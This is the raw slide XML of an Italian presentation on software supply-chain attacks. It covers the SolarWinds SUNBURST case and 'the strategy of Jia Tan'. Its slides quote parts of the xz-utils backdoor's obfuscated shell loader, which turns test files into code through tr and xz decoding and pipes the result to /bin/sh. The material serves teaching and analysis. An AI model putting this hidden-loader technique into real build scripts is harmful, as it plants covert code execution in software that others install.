            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31265</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\0-\377")| </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc|/bin/sh
####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="24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77069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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73743" y="1849693"/>
            <a:ext cx="12115185" cy="144655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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esempio: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>caso SUNBURST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (2020)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, diagramma, schermata, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC203C1-B107-B850-63DE-EAC9CF5A3E1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967" t="3052" r="149" b="3794"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684579" y="2374308"/>
            <a:ext cx="8606644" cy="4478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38362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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150839" y="1553097"/>
            <a:ext cx="13573848" cy="59093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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/bad-3-corrupt_lzma2.xz | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\t \-_" " \t_\-" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -d
####Hello####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0xE5 0x55 0x89 0xB7 0x24 0x04 0xD8 0x17</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> test -f ../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status;then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= ../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>="../../$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
fi
export i="((head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
